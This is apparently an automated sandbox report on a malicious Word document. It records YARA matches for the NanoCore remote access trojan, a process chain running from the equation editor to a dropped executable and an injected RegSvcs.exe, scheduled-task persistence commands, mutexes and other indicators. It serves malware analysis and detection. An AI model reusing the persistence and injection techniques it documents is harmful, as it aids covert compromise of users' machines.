        Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.RegSvcs.exe.560000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.560000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 7.2.RegSvcs.exe.367dacc.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.367dacc.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000002.704921985.0000000000550000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000002.704921985.0000000000550000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegSvcs.exe PID: 2936, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_001A7356
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_001A93F6
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00340138
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_003489B2
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00341AC8
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00341F90
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00340006
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00349845
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_003450BB
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_003430E8
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_0034012A
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_0034C22E
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00348267
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00341AB7
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00342EA0
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00342E8F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00565AD1
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00563DFF
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00382418
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003838C8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00389988
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00388D88
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0038B658
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00383020
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003830E7
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0038A230
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00389A4F
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00430B8A NtQuerySystemInformation,
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00430B59 NtQuerySystemInformation,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003D16DA NtQuerySystemInformation,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003D169F NtQuerySystemInformation,
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E90000 page execute and read and write
        Source: catzx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: catzjt7863.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: eWoGxZG.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ... .......................N.......................................X...............................
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P..... .......................T...............................................X.......X...............
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ..................'.............x.'.....(.P.....`.......@.......P...............................................................................
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................h.......(.P.....................................................................................................
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\catzjt7863.exe C:\Users\user\AppData\Roaming\catzjt7863.exe
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\eWoGxZG' /XML 'C:\Users\user\AppData\Local\Temp\tmp566B.tmp'
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp249A.tmp'
        Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1E64.tmp'
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\catzjt7863.exe C:\Users\user\AppData\Roaming\catzjt7863.exe
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\eWoGxZG' /XML 'C:\Users\user\AppData\Local\Temp\tmp566B.tmp'
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp249A.tmp'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1E64.tmp'
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00430A0E AdjustTokenPrivileges,
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_004309D7 AdjustTokenPrivileges,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003D149A AdjustTokenPrivileges,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003D1463 AdjustTokenPrivileges,
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$rchase order_122.docJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCEB.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@18/17@22/2
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 7.0.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 7.0.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 7.0.RegSvcs.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 7.0.RegSvcs.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: Purchase order_122.docJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{70bb352e-dceb-4105-9fdd-010e83e28b1b}
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeMutant created: \Sessions\1\BaseNamedObjects\ZXYpidgSeDxfiqu
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile created: C:\Program Files (x86)\SMTP ServiceJump to behavior
        Source: catzjt7863.exeString found in binary or memory: $c2808ccb-5ae8-48e8-add6-1570f353a9d0
        Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
